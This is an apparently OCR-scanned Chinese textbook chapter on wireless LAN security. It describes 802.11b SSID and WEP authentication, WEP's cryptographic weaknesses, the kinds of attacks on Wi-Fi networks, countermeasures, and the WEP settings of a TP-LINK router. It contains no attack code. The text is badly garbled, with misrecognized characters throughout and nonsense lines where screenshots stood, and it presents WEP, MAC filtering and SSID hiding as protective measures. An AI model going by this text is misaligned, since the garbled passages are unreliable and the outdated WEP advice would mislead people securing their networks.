今天 , 无 线 局 域 网 已 与 有 线 局 域 网 紧密 地 结合 在 一 起 , 并 且 已 经 成 为 市 场 的 主流 产品 。 
在 无 线 局 域 网 上 ， 数 据 传输 是 通过 无 线 电波 在 空中 广播 的 ， 因 此 在 发 射 机 覆盖 范围 内 数据 
可 以 被 任何 无 线 局 域 网 终端 接收 。 安 装 一 套 无 线 局 域 网 就 好 像 在 任何 地 方 都 放置 了 以 太 网 
接口 。 因 此 ， 无 线 局 域 网 的 用 户主 要 关心 的 是 网 络 的 安全 性 ， 它 主要 包括 接 入 控制 和 加 密 
两 个 方面 。 
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9.2.1 无 线 网 络 标准 的 安全 性 


802.11 是 IEEE 制定 的 第 一 个 无 线 局 域 网 标准 ， 主 要 用 于 解决 办 公 室 局 域 网 和 校园 网 
中 用 户 与 用 户 终 端的 无 线 接 入 ， 业 务 主要 限于 数据 访问 ， 速 率 最 高 只 能 达到 2Mbps。 由 于 
它 在 速率 和 传输 距离 上 都 不 能 满足 人 们 的 需要 ， 因 此 ，IEEE 小 组 又 相继 推出 了 802.11b 和 
802.11a 两 个 新 标准 ， 前 者 已 经 成 为 目前 的 主流 标准 。 

IEEE 802.11b 标准 定义 了 两 种 方法 实现 无 线 局 域 网 的 接 入 控制 和 加 密 : 系统 ID(SSID) 
和 有 线 对 等 加 密 (WEP)。 

1. 认证 

当 一 个 站 点 与 另 一 个 站 点 建立 网 络 连接 之 前 ， 必 须 首 先 通过 认证 。 执 行 认证 的 站 点 发 
送 一 个 管理 认证 帧 到 一 个 相应 的 站 点 。IEEE 802.11b 标准 详细 定义 了 两 种 认证 服务 : 开放 
系统 认证 (Open System Authentication): 是 802.11b 默认 的 认证 方式 。 这 种 认证 方式 非常 简 
单 ， 分 为 两 步 : 首先 ， 向 认证 另 一 站 点 的 站 点 发 送 一 个 含有 发 送 站 点 身份 的 认证 管理 帧 ; 
然后 ， 接 收 站 发 回 一 个 提醒 它 是 否 识别 认证 站 点 身份 的 帧 。 共 享 密 钥 认证 (Shared Key 
Authentication): 这 种 认证 先 假定 每 个 站 点 通过 一 个 独立 于 802.11 网 络 的 安全 信道 , 已 经 接 
收 到 一 个 秘密 共享 密 钥 ， 然 后 这 些 站 点 通过 共享 密 钥 的 加 密 认 证 ， 加 密 算法 是 有 线 等 价 加 
密 (WEP)。 共 享 密 钥 认证 的 过 程 描述 如 下 : 

(1) 请 求 工作 站 向 另 一 个 工作 站 发 送 认 证 帧 。 

(2) 当 一 个 站 收 到 开始 认证 帧 后 ， 返 回 一 个 认证 帧 ， 该 认证 帧 包含 WEP 服务 生成 的 
128 字 节 的 质询 文本 。 

(3) 请 求 工 作 站 将 质询 文本 复制 到 一 个 认证 帧 中 ， 用 共享 密 钥 加 密 ， 然 后 再 把 帧 发 往 
相应 工作 站 。 

(4) 接收 站 利用 相同 的 密 钥 对 质询 文本 进行 解密 ， 将 其 和 早先 发 送 的 质询 文本 进行 比 
较 。 如 果 相 互 匹配 ， 相 应 工作 站 返回 一 个 表示 认证 成 功 的 认证 帧 ， 如果 不 匹配 ， 则 返回 失 
败 认 证 帧 ， 如 图 9-6 所 示 。 


请 求 工作 站 响应 工作 站 


验证 算法 标识 ~“ 共享 密 铀 ” 
验证 处 理 序列 号 =1 


质询 文本 加 密 


验证 算法 标识 ~“ 共 享 密 铀 ” 
验证 处 理 序列 号 =1 


9-6 ”共享 密 钥 认证 


认证 使 用 的 标识 码 称 为 服务 组 标识 符 (SSID: Service Set Identifier)， 它 提供 一 个 最 底层 
的 接 入 控制 。 一 个 SSID 是 一 个 无 线 局 域 网 子 系统 内 通用 的 网 络 名 称 ， 它 服务 于 该 子 系统 
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内 的 逻辑 段 。 因 为 SSID 本 身 没有 安全 性 ， 所 以 用 SSID 作为 接 入 控制 是 不 够 安全 的 。 接 入 
单 击 作为 无 线 局 域 网 用 户 的 连接 设备 ， 通 常 广播 SSID。 


2. WEP 


IEEE 802.11b 规定 了 一 个 可 选择 的 加 密 称 为 有 线 对 等 加 密 , 即 WEP。WEP 提供 一 种 无 
线 局 域 网 数据 流 的 安全 方法 。WEP 是 一 种 对 称 加 密 ， 加 密 和 解密 的 密 钥 及 算法 相同 。 

WEP 的 目标 是 : 

(1) 接 入 控制 : 防止 未 授权 用 户 接 入 网 络 ， 他 们 没有 正确 的 WEP 密 钥 。 

(2) 加 密 : 通过 加 密 和 只 允许 有 正确 WEP 密 钥 的 用 户 解密 来 保护 数据 流 。 

IEEE 802.11b 标准 提供 了 两 种 用 于 无 线 局 域 网 的 WEP 加密 方 案 。 

第 一 种 方案 可 提供 四 个 默认 密 钥 以 供 所 有 的 终端 共享 一 一 包括 一 个 子 系统 内 的 所 有 接 
入 单 击 和 客户 适配器 。 当 用 户 得 到 默认 密 钥 以 后 , 就 可 以 与 子 系统 内 所 有 用 户 安全 地 通信 。 
默认 密 钥 存在 的 问题 是 当 它 被 广泛 分 配 时 可 能 会 危及 安全 。 

第 二 种 方案 中 是 在 每 一 个 客户 适配器 建立 一 个 与 其 他 用 户 联系 的 密 钥 表 。 该 方案 比 第 
一 种 方案 更 加 安全 ， 但 随 着 终端 数量 的 增加 给 每 一 个 终端 分 配 密 钥 很 困难 。 


9.2.2 无 线 网 络 安全 性 的 影响 因素 


1. 硬件 设备 

在 现 有 的 WLAN 产品 中 , 常用 的 加 密 方法 是 给 用 户 静 态 分 配 一 个 密 钥 ， 该 密 钥 或 者 存 
储 在 磁盘 上 或 者 存储 在 无 线 局 域 网 客户 适配器 的 存储 器 上 。 这 样 ， 拥 有 客户 适配器 就 有 了 
MAC 地 址 和 WEP 密 钥 并 可 用 它 接 入 到 接 入 点 。 如 果 多 个 用 户 共享 一 个 客户 适配器 ， 这 些 
用 户 有 效 地 共享 MAC 地 址 和 WEP 密 钥 。 
当 一 个 客户 适配器 丢失 或 被 窃 的 时 候 , 合法 用 户 没 有 MAC 地 址 和 WEP 密 钥 不 能 接 入 ， 
但 非法 用 户 可 以 。 网 络 管理 系统 不 可 能 检测 到 这 种 问题 ， 因 此 用 户 必 须 立 即 通知 网 络 管理 
员 。 接 到 通知 后 ， 网 络 管理 员 必 须 改 变 接 入 到 MAC 地 址 的 安全 表 和 WEP 密 铀 ， 并 给 予 丢 
失 或 被 窃 的 客户 适配器 使 用 相同 密 钥 的 客户 适配器 重新 编码 静态 加 密 密 钥 。 客 户 端 越 多 ， 
重新 编码 WEP 密 钥 的 数量 就 越 大 。 
2. 虚假 接 入 单 击 
IEEE802.11b 共享 密 钥 认证 表 采 用 单 向 认证 ， 而 不 是 互相 认证 。 接 入 点 鉴别 用 户 ， 但 
用 户 不 能 鉴别 接 入 点 。 如 果 一 个 虚假 接 入 点 放 在 无 线 局 域 网 内 ， 它 可 以 通过 劫持 合法 用 户 
的 客户 适配器 进行 拒绝 服务 或 攻击 。 

因此 在 用 户 和 认证 服务 器 之 间 进 行 相互 认证 是 需要 的 ， 每 一 方 在 合理 的 时 间 内 证 明 自 
己 是 合法 的 。 因 为 用 户 和 认证 服务 器 是 通过 接 入 点 进行 通信 的 , 接 入 点 必须 支持 相互 认证 。 
相互 认证 使 检测 和 隔离 虚假 接 入 点 成 为 可 能 。 

3. 其 他 安全 问题 


标准 WEP 支持 对 每 一 组 加 密 , 但 不 支持 对 每 一 组 认证 。 从 响应 和 传送 的 数据 包 中 一 个 
黑客 可 以 重建 一 个 数据 流 ， 组 成 欢 骗 性 数据 包 。 减 轻 这 种 安全 威胁 的 方法 是 经 常 更 换 WEP 


下 


钥 。 
通过 监测 IEEE802.11b 控制 信道 和 数据 信道 ， 黑 客 可 以 得 到 如 下 信息 : 

(1) 客户 端 和 接 入 点 MAC 地 址 。 

(2) 内 部 主机 MAC 地 址 。 

(3) 上 网 时 间 。 

黑客 可 以 利用 这 些 信 息 研究 提供 给 用 户 或 设备 的 详细 资料 。 为 减少 这 种 黑客 活动 ， 一 
个 终端 应 该 使 用 每 一 个 时 期 的 WEP 密 铀 ， 如 图 9-7 所 示 。 


RADIUS 服务 器 和 站 点 双 
向 认证 并 且 生成 WEP 密 钥 


站 点 | 天 线 接 入 点 帮 放 | 


站 点 和 AP 激活 RADIUS 服务 器 
WEP， 加 密 传输 数据 把 密 钥 传 给 AP 


图 9-7 认证 的 全 部 过 程 
9.2.3 ”无 线 网 络 常见 的 攻击 


无 线 网 络 可 能 受到 的 攻击 分 为 两 类 : 一 类 是 关于 网 络 访问 控制 、 数 据 机 密 性 保护 和 数 
据 完整 性 保护 进行 的 攻击 ， 这 类 攻击 在 有 线 环境 下 也 会 发 生 ;， 另 一 类 则 是 由 无 线 介质 本 身 
的 特性 决定 的 ， 基 于 无 线 通信 网 络 设计 、 部 署 和 维护 的 独特 方式 而 进行 的 攻击 。 

1. WEP 中 存在 的 弱点 


IEEE(Institute of Electrical and Electronics Engineers， 电 气 与 电子 工程 师 学 会 ) 制 定 的 
802.11 标准 最 早 是 在 1999 年 发 布 的 ， 它 描述 了 WLAN(Wireless Local Area Network， 无 线 
局 域 网 ) 和 WMAN(Wireless Metropolitan Area Network, 无 线 城 域 网 ) 的 MAC(Medium Access 
Control， 介 质 访问 控制 ) 和 物理 层 的 规范 。 为 了 防止 出 现 无 线 网 络 用 户 偶 然 窃 听 的 情况 ， 和 
提供 与 有 线 网 络 中 功能 等 效 的 安全 措施 ，IEEE 引入 了 WEP (Wired Equivalent Privacy， 有 
线 等 价 保密 ) 算 法 。 和 许多 新 技术 一 样 ， 最 初 设计 的 WEP 被 人 们 发 现 了 许多 严重 的 弱点 。 
专家 们 利用 已 经 发 现 的 弱点 , 攻破 了 WEP 声称 具有 的 所 有 安全 控制 功能 。 总 的 来 说 ，WEP 
存在 如 下 弱点 。 

(1) 整体 设计 : 在 无 线 环 境 中 ,不 使 用 保密 措施 是 具有 很 大 风险 的 , 但 WEP 协议 只 是 
802.11 设备 实现 的 一 个 可 选项 。 

(2) 加 密 算法 : WEP 中 的 TIVGmnitialization Vector， 初 始 化 向 量 ) 由 于 位 数 太 短 和 初始 化 
复位 设计 ， 容 易 出 现 重 用 现象 ， 从 而 被 人 破解 密 钥 。 而 对 用 于 进行 流 加 密 的 RC4 算法 ， 在 
其 头 256 个 字 节 数据 中 的 密 钥 存在 弱 单 击 , 目前 还 没有 任何 一 种 实现 方案 修正 了 这 个 缺陷 。 
此 外 用 于 对 明文 进行 完整 性 校 验 的 CRC(Cyclic Redundancv Check, 循环 元 余 校 验 ) 只 能 确保 
数据 正确 传输 ， 并 不 能 保证 其 未 被 修改 ， 因 而 并 不 是 安全 的 校 验 码 。 

(3) 密 钥 管理 : 802.11 标准 指出 ，WEP 使 用 的 密 钥 需要 接受 一 个 外 部 密 钥 管理 系统 的 
控制 。 通过 外 部 控制 ， 可 以 减少 F 的 冲突 数量 ， 使 得 无 线 网 络 难 以 攻破 。 但 问题 在 于 这 个 
过 程 形式 非常 复杂 ， 并 且 需 要 手工 操作 。 因 而 很 多 网 络 的 部 署 者 更 倾向 于 使 用 默认 的 WEP 
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密 铀 ， 这 使 黑客 为 破解 密 钥 所 作 的 工作 量 大 大 减少 了 。 另 一 些 高 级 的 解决 方案 需要 使 用 额 
外 资源 ， 如 RADIUS 和 Cisco 的 LEAP， 其 花费 是 很 昂贵 的 。 

(4) 用 户 行为 : 许多 用 户 都 不 会 改变 默认 的 配置 选项 ， 这 令 黑客 很 容易 推断 出 或 猜 出 

2. 执行 搜索 

NetStumbler 是 第 一 个 被 广泛 用 来 发 现 无 线 网 络 的 软件 。 据 统计 ， 有 超过 50% 的 无 线 
网 络 是 不 使 用 加 密 功 能 的 。 通 常 即使 加 密 功能 处 于 活动 状态 ，WAP(Wireless Access Point， 
无 线 接 入 点 ) 广 播 信息 中 仍然 包括 许多 可 以 用 来 推断 出 WEP 密 钥 的 明文 信息 , 如 网 络 名 称 、 
SSID(Secure Set Identife ， 安 全 集 标 识 符 ) 等 。 

3. 窃听 、 截 取 和 监听 

窃听 是 指 偷 听 流 经 网 络 的 计算 机 通信 的 电子 形式 。 它 是 以 被 动 和 无 法 觉察 的 方式 入 侵 
检测 设备 的 。 即 使 网 络 不 对 外 广播 网 络 信息 ， 只 要 能 够 发 现任 何 明 文 信息 ， 攻 击 者 仍然 可 
以 使 用 一 些 网 络 工具 ， 如 Eth real 和 TCPDump 来 监听 和 分 析 通 信 量 ， 从 而 识别 出 可 以 破 
坏 的 信息 。 使 用 虚拟 专用 网 、SSL(Secure Sockets Lave 安全 套 接 字 层 ) 和 SSH(Secure Shell) 
有 助 于 防止 无 线 拦 截 。 

4. 欺骗 和 非 授权 访问 

因为 TCP/IP 协议 的 设计 原因 ， 几 乎 无 法 防止 MAC / IP 地 址 欺骗 。 只 有 通过 静态 定义 
MAC 地 址 表 才 能 防止 这 种 类 型 的 攻击 。 但 是 , 因为 巨大 的 管理 负担 , 这 种 方案 很 少 被 采用 。 
只 有 通过 智能 事件 记录 和 监控 日 志 才 可 以 对 付 已 经 出 现 过 的 欺骗 。 当 试图 连接 到 网 络 上 的 
时 候 ， 简 单 地 通过 让 另外 一 个 结 点 重新 问 AP 提交 身份 验证 请 求 ， 就 可 以 很 容易 地 欺骗 无 
线 网 身份 验证 。 许 多 无 线 设 备 提供 商 允 许 终端 用 户 通过 使 用 设备 附带 的 配置 工具 ， 重 新 定 
义 网 卡 的 MAC 地 址 。 使 用 外 部 双 因 子 身份 验证 ， 如 RADIUS 或 SecurID， 可 以 防止 非 授 
权 用 户 访问 无 线 网 及 其 连接 的 资源 ， 并 且 在 实现 的 时 候 ， 应 该 对 需要 经 过 强 验证 才能 访问 
资源 的 访问 进行 严格 的 限制 。 

5. 网 络 接管 与 算 改 


同样 因为 TCP/IP 协议 设计 的 原因 , 某 些 技术 可 供 攻击 者 接管 与 其 他 资源 建立 的 网 络 连 
接 。 如 果 攻 击 者 接管 了 某 个 AP， 那 么 所 有 来 自 无 线 网 的 通信 量 都 会 传 到 攻击 者 的 机 器 上 ， 
包括 其 他 用 户 试图 访问 合法 网 络 主机 时 需要 使 用 的 密码 和 其 他 信息 。 欺 诈 AP 可 以 让 攻击 
者 从 有 线 网 或 无 线 网 进行 远程 访问 ， 而 且 这 种 攻击 通常 不 会 引起 用 户 的 重视 ， 用 户 通常 是 
在 毫 无 防范 的 情况 下 输入 自己 的 身份 验证 信息 ， 甚 至 在 接 到 许多 SSL 错误 或 其 他 密 钥 错误 
的 通知 之 后 , 仍 像 是 看 待 自己 机 器 上 的 错误 一 样 看 待 它们 , 这 让 攻击 者 可 以 继续 接管 连接 ， 
而 不 必 担 心 被 别人 发 现 。 

6. 拒绝 服务 攻击 


无 线 信号 传输 的 特性 和 专门 使 用 扩 频 技术 ， 使 得 无 线 网 络 特别 容易 受到 DoS(Denial of 
Service, 拒绝 服务 ) 攻 击 的 威胁 。 拒绝 服务 是 指 攻 击 者 恶意 占用 主机 或 网 络 儿 乎 所 有 的 资源 ， 
使 得 合法 用 户 无 法 获得 这 些 资源 。 要 造成 这 类 的 攻击 ， 最 简单 的 办 法 是 通过 让 不 同 的 设备 
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使 用 相同 的 频率 ， 从 而 造成 无 线 频谱 内 出 现 冲 突 。 另 一 个 可 能 的 攻击 手段 是 发 送 大 量 非法 
(或 合法 ) 的 身份 验证 请 求 。 第 三 种 手段 ， 如 果 攻击 者 接管 AP， 并 且 不 把 通信 量 传递 到 恰当 
9 目的 地 ， 那 么 所 有 的 网 络 用 户 都 将 无 法 使 用 网 络 。 为 了 防止 Dog 攻击 ， 可 以 做 的 事情 很 
少 。 无 线 攻击 者 可 以 利用 高 性 能 的 方向 性 天 线 ， 从 很 远 的 地 方 攻击 无 线 网 。 已 经 获得 有 线 
网 访问 权 的 攻击 者 ， 可 以 通过 发 送 无 线 AP 无 法 处 理 的 通信 量 来 攻击 它 。 此 外 为 了 获得 与 
户 的 网 络 配置 发 生 冲 突 的 网 络 ， 只 要 利用 NetStumbler 就 可 以 做 到 。 

7. 恶意 软件 

凭借 技巧 定制 的 应 用 程序 ， 攻 击 者 可 以 直接 到 终端 用 户 上 查找 访问 信息 ， 例 如 访问 用 
户 系 统 的 注册 表 或 其 他 存储 位 置 ,以便 获取 WEP 密 钥 并 把 它 发 送 回 到 攻击 者 的 机 器 上 。 注 
意 让 软件 保持 更 新 ， 并 且 过 制 攻击 的 可 能 来 源 (Web 浏览 器 、 电 子 邮 件 、 运 行 不 当 的 服务 器 
服务 等 )， 这 是 唯一 可 以 获得 的 保护 措施 。 

8. 偷窃 用 户 设备 


只 要 得 到 了 一 块 无 线 网 网 卡 ， 攻 击 者 就 可 以 拥有 一 个 无 线 网 使 用 的 合法 MAC 地 址 。 
也 就 是 说 ， 如 果 终 端 用 户 的 笔记 本 电脑 被 盗 ， 他 丢失 的 不 仅仅 是 电脑 本 身 ， 还 包括 设备 上 
的 身份 验证 信息 ， 如 网 络 的 SSID 及 密 钥 。 而 对 于 别有用心 的 攻击 者 而 言 ， 这 些 往往 比 电 
脑 本 身 更 有 价值 。 


9.2.4 无线 网 络 安全 对 策 


yy 


1. 分 析 威 肋 
分 析 威胁 是 保护 网 络 的 第 一 步 。 应 当 确定 潜在 入 侵 者 ， 并 纳入 规划 网 络 的 计划 。 
2. 设计 和 部 署 安全 网 络 


改变 默认 设置 。 把 基站 看 作 RAS(Remote Access Server， 远 程 访问 服务 器 )， 指 定 专 用 
于 WLAN 的 I 了 P 协议。 在 AP 上 使 用 速度 最 快 的 、 能 够 支持 的 安全 功能 。 考 虑 天 线 对 授权 
用 户 和 入 侵 者 的 影响 。 在 网 络 上 ， 针 对 全 部 用 户 使 用 一 致 的 授权 规则 。 在 不 会 被 轻易 损坏 
的 位 置 部 署 硬 件 。 

3. 实现 WEP 


WEP 单独 使 用 ， 并 不 能 提供 足够 的 WLAN 安全 性 。 但 通过 在 每 帧 中 混入 一 个 校 验 和 
的 做 法 ，WEP 能 够 防止 一 些 初步 的 攻击 手段 ， 即 向 流 中 插入 已 知 文本 来 破解 密 钥 流 ， 必 须 
在 每 个 客户 端 和 每 个 AP 上 实现 WEP 才能 起 作用 。 不 必 一 定 使 用 预先 定义 的 WEP 密 钥 ， 
可 以 由 用 户 来 定义 密 钥 ， 而 且 能 够 经 常 修改 。 要 使 用 最 坚固 的 WEP 版 本 ， 并 与 标准 的 最 新 
更 新 版 本 保持 同步 。 

4. 过 滤 MAC 


把 MAC 过 滤器 作为 第 一 层 保护 措施 。 应 该 记录 WLAN 上 使 用 的 每 个 MAC 地 址 ， 并 
配置 在 AP 上 ， 只 允许 这 些 地 址 访问 网 络 。 使 用 日 志 记录 产生 的 错误 ， 并 定期 检查 ， 以 判 
断 是 否 某 些 人 企图 突破 安全 措施 。 
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潼 洲 党 粮 半 ”车 潍 侣 时 出 到 灌 于 


5. 过 滤 协 议 

过 滤 协 议 是 个 相当 有 效 的 方法 ， 能 够 限制 那些 企图 通过 SNMP(Simple Network 
Management Protocol， 简 单 网 络 管理 协议 ) 访 问 无 线 设 备 来 修改 配置 的 WLAN 用户， 还 可 
以 防止 使 用 较 大 的 ICMP(Intemet Control Message Protocol， 网 际 控制 报 文 协议 ) 包 和 其 他 会 
用 作 Dos 的 协议 。 过 滤 全 部 适合 的 协议 和 地 址 ， 维 持 对 穿越 自己 网 络 的 数据 的 控制 。 

6. 使 用 封闭 系统 和 网 络 
尽管 可 以 很 轻易 地 捕获 RF(Radio Frequency， 无 线 频率 ) 通 信 ， 但 是 通过 防止 SSID 从 
AP 向 外 界 广播 ， 就 可 以 克服 这 个 缺点 。 封 闭 整 个 网 络 ， 避 免 随 时 可 能 发 生 的 无 效 连 接 ， 把 
必要 的 客户 端 配置 信息 安全 地 分 发 给 WLAN 用 户 。 

7. 分 配 IP 


判断 使 用 哪 一 个 分 配 IP 的 方法 最 适合 自己 的 机 构 : 静态 还 是 动态 指定 地 址 。 静态 地 址 
可 以 避免 黑客 自动 获得 瑟 地 址 ， 而 动态 地 址 可 以 简化 WLAN 的 使 用 ， 可 以 降低 那些 繁重 
的 管理 工作 。 静 态 卫 范围 使 黑客 不 得 不 猜测 WLAN 中 的 子 网 。 

8. 使 用 VPN 


在 合适 的 位 置 使 用 VPN(Virtual Private Network, 虚拟 专用 网 ) 服 务 。 这 是 最 安全 的 远程 
访问 方法 。 一 些 AP( 例 如 Colubris 和 Nokia) 为 了 执行 的 方便 ， 已 经 内 置 了 VPN。 

在 信息 领域 ， 没 有 绝对 安全 的 措施 。 可 以 肯定 的 是 ， 无 线 信息 产品 的 大 规模 普及 ， 依 
赖 于 安全 标准 的 进一步 完善 。 


9.3 无线 网 络 的 WEP 机 制 


Web 安全 技术 源 自 于 名 为 RC4 的 RSA 数据 加 密 技 术 ， 用 来 满足 用 户 更 高 层次 的 网 络 
安全 需求 。 随 着 无 线 网 络 的 逐渐 流行 及 对 安全 要 求 的 进一步 提高 ,使 用 WEP 加 密 的 缺陷 也 


9.3.1 WEP 机 制 简介 


1. 什么 是 WEP 

WEP(Wired Equivalent Privacy) 巨 线 等 效 保密 协议 是 由 802.11 标准 定义 的 ， 是 最 基本 
的 无 线 安全 加 密 措施 ， 用 于 在 无 线 局 域 网 中 保护 链 路 层 数据 ， 其 主要 用 途 如 下 : 

(1) 提供 接 入 控制 ， 防 止 未 授权 用 户 访问 网 络 。 

(2) WEP 加 密 算法 对 数据 进行 加 密 ， 防 止 数据 被 攻击 者 窃听 。 

(3) 防止 数据 被 攻击 者 中 途 恶意 自 改 或 伪造 。 

WEP 加 密 采 用 静态 的 保密 密 钥 ， 各 WLAN 终端 使 用 相同 的 密 钥 访问 无 线 网 络 。WEP 
也 提供 认证 功能 ， 当 加 密 机 制 功能 启用 ， 客 户 端 要 尝试 连接 上 AP 时 ，AP 会 发 出 一 个 
Challenge Packet 给 客户 端 ， 客户 端 再 利用 共享 密 钥 将 此 值 加 密 后 ， 送 回 存 取 点 以 进行 认证 
比 对 ， 如 果 正 确 无 误 ， 才 能 获准 存 取 网 络 的 资源 。40 位 WEP 具有 很 好 的 互 操作 性 ， 所 有 
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通过 Wi-Fi 组 织 认证 的 产品 都 可 以 实现 WEP 互 操作 。 现 在 的 WEP 也 一 般 支持 128 位 的 钥 
匙 ， 提 供 更 高 等 级 的 安全 加 密 。 
2. WEP 的 原理 
WEP 加 密 算法 的 过 程 示 意图 如 图 9-8 所 示 。 
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9-8 WEP 加 密 过 程 


(1) 在 发 送 端 ,WEP 首先 利用 一 种 综合 算法 对 MAC 帧 中 的 帧 体 字段 进行 加 密 ， 生 成 
四 字 节 的 综合 检测 值 。 检 测 值 和 数据 一 起 被 发 送 ， 在 接收 端 对 检测 值 进行 检查 ， 以 监视 非 
法 的 数据 改动 。 

(2) WEP 程序 将 共用 密 钥 输 入 伪 随 机 数 生成 器 生成 一 个 键 序 , 键 序 的 长 度 等 于 明文 和 
综合 检测 值 的 长 度 。 

(3) WEP 对 明文 和 综合 检测 值 进行 模 二 加 运算 ， 生 成 密 文 ， 完 成 对 数据 的 加 密 。 伪 随 
机 数 生成 器 可 以 完成 密 钥 的 分 配 ， 因 为 每 台 终 端 只 用 到 共用 密 钥 ， 而 不 是 长 度 可 变 的 键 序 。 

(4) 在 接收 端 ，WEP 利用 共用 密 钥 进行 解密 ， 复 原 成 原先 用 来 对 帧 进行 加 密 的 键 序 。 

(5) 工作 站 计算 综合 检测 值 ， 随 后 确认 计算 结果 与 随 帧 一 起 发 送 来 的 值 是 否 匹 配 。 如 
果 综 合 检测 失败 ， 工 作 站 不 会 把 MSDU( 介 质 服务 单元 ) 送 到 LLC( 逻 辑 链 路 控制 ) 层 ， 并 向 
MAC 管理 程序 发 回 失败 声明 。 

3. WEP 的 缺陷 


WEP 是 目前 最 普遍 的 无 线 加 密 机 制 ， 但 同样 也 是 较为 脆弱 的 安全 机 制 ,存在 许多 缺陷 
1) “缺少 密 钥 管理 
用 户 的 加 密 密 钥 必须 与 AP 的 密 钥 相 同 ， 并 且 一 个 服务 区 内 的 所 有 用 户 都 共享 同一 把 
密 钥 。WEP 标准 中 并 没有 规定 共享 密 钥 的 管理 方案 ， 通 常 是 手工 进行 配置 与 维护 。 由 于 同 
时 更 换 密 钥 的 费时 与 困难 ,所 以 密 钥 通常 长 时 间 使 用 而 很 少 更 换 , 倘若 一 个 用 户 丢 失 密 钥 ， 
则 将 殉 及 到 整个 网 络 。 

2) ICV 算法 不 合适 

WEP ICV 是 一 种 基于 CRC-32 的 用 于 检测 传输 噪音 和 普通 错误 的 算法 。CRC-32 是 信 
息 的 线性 函数 ， 这 意味 着 攻击 者 可 以 算 改 加 密 信息 ， 并 很 容易 地 修改 ICV， 使 信息 表面 看 
起 来 是 可 信和 的 。 能 够 算 改 即 加 密 数据 包 ， 使 各 种 各 样 的 非常 简单 的 攻击 成 为 可 能 。 

3) ”RC4 算法 存在 弱点 

在 RC4 中 ， 人 们 发 现 了 弱 密 钥 。 所 谓 弱 密 钥 ， 就 是 密 钥 与 输出 之 间 存 在 超出 一 个 好 密 
码 所 应 具有 的 相关 性 。 在 24 位 的 IV 值 中 ， 有 9000 多 个 弱 密 钥 。 攻 击 者 收集 到 足够 的 使 
用 弱 密 钥 的 包 后 ， 就 可 以 对 它们 进行 分 析 ， 只 需 尝 试 很 少 的 密 钥 就 可 以 接 入 到 网 络 中 。 
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9.3.2 ”WEP 在 无 线路 由 器 上 的 应 用 


目前 ， 基 本 上 所 有 的 无 线 设备 都 支持 WEP。 下 面 我 们 就 以 TP-LINK 公司 的 无 线 宽带 
路 由 器 TL-WR641G 和 无 线 网 卡 TL-WN620G 为 例 ， 讲 解 无 线 网 络 WEP 加 密 应 用 。 


1. 无 线路 由 器 配置 

1) ”启用 WEP 加 密 

选择 “无 线 设置 ”一 “基本 设置 ”， 打 开路 由 器 管理 界面 ， 如 图 9-9 所 示 。 
人 


本 页 面 只 轩 外 由 前 无 烧 隐 的 基本 允 梁 和 实 全 认证 造 磺 。 
证 瘟 ; 当局 用 oogvys Gtats x, 和 扫 坟 和 业 区 "本 是 "的 
无 模 网 卡 才能 正 军 连 菇 基本 第 由 | 
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地 弄 64 位 下 钥 斋 镇 入 16 旭 制 烘 子 天 10 个 ,可 看 KSCII 凤 
于 6 个 。 连 舌 128 位 外 多 镶 入 14 寺 风 于 究 26 个 ， 科 

cr 这 闫 152 位 天 届 吉 流入 6 于 
个， 来 者 he 于 再 1 个。 


[ 瑟 研 诺 拓 LE [二 | 

mi el[ J 可 | 

a | 

EW: Ol 

welL J ba | 
区 到 区 


图 9-9 无 线 网 络 基本 设置 

“安全 认证 类 型 ”选择 “自动 选择 ”， 因 为 “自动 选择 ”就 是 在 “开放 系统 ”和 “ 共 
享 密 钥 ”之 中 自动 协商 一 种 ， 而 这 两 种 的 认证 方法 的 安全 性 没有 什么 区 别 。 

“ 密 钥 格式 选择 ”选择 “16 进 制 ”， 还 有 可 选 的 是 “ASCII 码 ”， 这 里 的 设置 对 安全 
性 没有 任何 影响 ， 因 为 设置 “单独 密 钥 ” 的 时 候 需 要 “16 进 制 ”， 所 以 这 里 推荐 使 用 “16 
进 制 ”。 

“ 密 钥 选择 ”必须 填 入 “ 密 钥 2” 的 位 置 ， 这 里 一 定 要 这 样 设置 ， 因 为 在 新 的 升级 
程序 下 ， 密 钥 1 必须 为 空 ， 目 的 是 为 了 配合 单独 密 钥 的 使 用 (单独 密 钥 会 在 下 面 的 MAC 
地 址 过 滤 中 介绍 )， 不 这 样 设置 的 话 可 能 会 连接 不 上 。 密 钥 类 型 选择 64/128/152 位 ， 选 择 
了 对 应 的 位 数 以 后 “ 密 钥 类 型 ”的 长 度 会 变更 ， 本 例 中 我 们 填 入 了 128 位 参数 
11111111111111111111111111。 因 为 “ 密 钥 格式 选择 ”为 “16 进 制 ”， 所 以 “ 密 钥 内 容 ” 
可 以 填 入 的 字符 是 0、1、2、3、4、5、6、7、8、9、a、b、c、d、e、f， 设 置 完 记 得 保存 。 

如 果 不 需要 使 用 “单独 密 钥 ” 功 能 ， 网 卡 只 需要 简单 配置 成 加 密 模 式 的 密 钥 格式 ， 密 
钥 内 容 要 和 路 由 器 一 样 ， 密 钥 设 置 也 要 设置 为 “WEP 密 钥 2” 的 位 置 (和 路 由 器 对 应 )， 这 
时 候 就 可 以 连接 上 路 由 器 了 。 

2) 单独 密 钥 的 使 用 

这 里 的 MAC 地 址 过 滤 可 以 指定 某 些 MAC 地 址 ,可 以 访问 本 无 线 网 络 而 其 他 的 不 可 以 ， 


这 沙 若 烘 玫 “ 斗 溢 人 从 并 困 巴 强 必 


TT 第 9 墓 无 络 婴 经 安全 


“单独 密 钥 ”功能 可 以 为 单个 MAC 指定 一 个 单独 的 密 钥 ， 这 个 密 钥 就 只 有 带 这 个 MAC 地 
址 的 网 卡 可 以 用 ， 其 他 网 卡 不 能 用 ， 增 加 了 一 定 的 安全 性 。 
打开 “无 线 设置 ”一 “MAC 地 址 过 滤 ”， 在 “无 线 网 络 MAC 地 址 过 滤 设 置 ”页 面 中 
添加 新 条 目 ， 如 图 9-10 所 示 。 
i 


广 意 : 654 位 密 角 128 位 密 钥 和 152 位 密 钥 《 16 进 制 形式 ) 只 有 在 安全 认证 方式 为 开 
放 系 统 、 共 享 密 钥 或 自动 选择 而 且 设置 默认 密 钢 时 才 有 效 ( 否则 视 为 化 许 通 过 ) 。 
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9-10 无 线 网 络 MAC 地 址 过 滤 设 置 


“MAC 地 址 ”参数 我 们 填 入 的 是 本 例 中 TL-WN620G 的 MAC 地 址 : 
00-0A-EB-A3-2C-E5，“ 类 型 ”可 以 选择 “允许 ”/“ 禁 止 ”/“64 位 密 钥 ”/“128 位 密 钥 ” 
/“152 位 密 钥 ”， 本 例 中 选择 了 “64 位 密 钥 ”。“ 人 允许 ”和 “禁止 ”只 是 简单 允许 或 禁止 
